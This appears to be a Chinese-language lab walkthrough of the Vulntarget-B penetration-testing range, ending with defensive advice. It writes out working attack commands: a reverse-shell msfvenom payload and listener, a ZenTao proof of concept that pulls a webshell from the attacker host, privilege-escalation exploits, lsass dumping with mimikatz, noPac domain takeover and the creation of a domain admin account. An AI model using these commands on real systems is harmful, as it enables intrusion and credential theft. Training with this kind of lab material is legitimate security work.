Vulntarget-B 靶场渗透实战教学文档

一、环境概述

Vulntarget-B 是一个模拟实战的渗透测试靶场环境，主要包含以下组件：

• 运行极致CMS建站系统（端口81）
• 宝塔面板环境（端口8888）
• 多服务开放（SSH、HTTP、MySQL等）
• 内网环境包含禅道系统（12.4.2版本）
• 域环境（包含域控和域成员主机）

二、外网渗透阶段

1. 信息收集

使用fscan进行扫描：

fscan version: 1.8.3
扫描结果：
- 192.168.0.103:8888 (宝塔面板)
- 192.168.0.103:81 (极致CMS)
- 192.168.0.103:22 (SSH)
- 192.168.0.103:80/443 (HTTP/HTTPS)
- 192.168.0.103:3306 (MySQL)

2. 初始访问

极致CMS入口点：

• 访问 http://192.168.0.103:81
• 使用弱口令登录：admin/admin123

获取Webshell：

1. 在后台安装编辑器插件
2. 通过插件写入Webshell
3. 使用蚁剑连接Webshell

3. 权限提升

绕过disable_functions：

• 使用蚁剑插件绕过限制
• 执行命令查看网络配置：/sbin/ifconfig

提权操作：

1. 生成Linux elf反弹shell
2. 使用CVE-2021-3156提权模块：

   exploit/linux/local/sudo_baron_samedit
   

3. 获取到用户凭证：
   • 用户：msf
   • 密码：jcwbrujljbtcith

三、内网横向移动

1. 隧道搭建

选择以下工具之一建立内网隧道：

• nps
• frp
• venom

2. 禅道系统渗透

目标信息：

• 禅道版本：12.4.2
• 存在远程文件下载漏洞

利用步骤：

1. 在踏板上创建PHP文件：

   echo "" > 1.php
   

2. 启动HTTP服务：

   python -m http.server
   或
   python -m SimpleHTTPServer
   

3. 执行POC：

   /index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==
   或
   /client-download-1-SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==-1.html
   

4. Webshell位置：/data/client/1/1.php

3. Windows系统渗透

生成Payload：

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=IP lport=4567 -f exe > shell.exe

监听设置：

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.20.33
set lport 4567
run

提权操作：

1. 使用自动提权检测：

   run post/multi/recon/local_exploit_suggester
   

2. 利用CVE-2021-1732：

   use exploit/windows/local/cve_2021_1732_win32k
   set session 3
   set lhost 10.0.20.33
   set lport 5757
   run
   

4. 凭证获取

使用Kiwi模块：

meterpreter > load kiwi
meterpreter > cred_all

密码喷射技术：

1. 修改注册表启用WDigest：

   reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
   

2. 使用procdump获取lsass.dmp：

   procdump64.exe -accepteula -ma lsass.exe lsass.dmp
   

3. 使用mimikatz提取凭证：

   mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
   

四、域渗透阶段

1. 域信息收集

run post/windows/gather/enum_domain

输出：

• 域名：vulntarget
• 域控：WIN-UH20PRD3EAO (IP: 10.0.10.100)

2. 利用CVE-2021-42278/42287

使用noPac工具：

.\noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test2 /mPassword admin@123 /service cifs /ptt

验证访问：

dir \\WIN-UH20PRD3EAO.vulntarget.com\c$

3. 域控接管

添加域管账户：

net user admin P@ssw0rd123 /add /domain
net group "Domain Admins" admin /add /domain

配置远程访问：

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

使用PsExec登录：

PsExec64.exe \\域控IP -u vulntarget\admin -p P@ssw0rd123 -s cmd.exe

五、关键漏洞总结

1. 极致CMS弱口令漏洞
2. 宝塔面板安全入口校验绕过
3. Linux提权漏洞（CVE-2021-3156）
4. 禅道12.4.2远程文件下载漏洞
5. Windows提权漏洞（CVE-2021-1732）
6. 域控漏洞（CVE-2021-42278/42287）

六、防御建议

1. 禁用默认/弱口令账户
2. 及时更新系统和应用补丁
3. 限制管理界面访问来源
4. 监控异常文件下载行为
5. 配置Kerberos审计策略
6. 限制机器账户创建权限
7. 启用LSA保护防止凭证转储

通过本实战演练，可以全面了解从外网渗透到内网横向移动，再到域环境攻防的完整攻击链，有助于提升企业网络安全防御能力。